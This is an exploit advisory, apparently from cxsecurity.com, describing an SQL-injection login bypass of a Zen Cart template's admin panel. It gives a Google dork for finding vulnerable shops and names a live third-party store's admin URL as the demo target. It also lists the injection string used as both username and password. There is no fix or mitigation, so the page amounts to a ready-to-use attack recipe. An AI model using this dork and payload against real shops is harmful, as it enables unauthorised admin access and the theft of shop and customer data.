Powered by Zen Cart. ZenCart Template Admin Panel Bypass Vulnerability

Published
Credit
Risk
2017.01.09
Thecenahmet
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:"Powered by Zen Cart. ZenCart Template"

##########################
# Exploit Title: Powered by Zen Cart. ZenCart Template Admin Panel Bypass Vulnerability
# Google Dork : intext:"Powered by Zen Cart. ZenCart Template"
# https://www.youtube.com/Thecenahmet
# Discovered By: #Thecenahmet
# Vendor Homepage : N/A
##########################
# {DEMO}

http://shoppurplehaze.com/giftloyalty/admin/adminlogin.php

[Login]

Username : '=' 'OR'
Passwd : '=' 'OR'

[Admin Page]

http://localhost/admin/adminlogin.php

[OR]
http://localhost//giftloyalty/admin/adminlogin.php

###################################
# Cyber Hack Team

# Discovered By: #THECENAHMET

# Twitter : @Thecenahmet

# skype: the.cenahmet


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com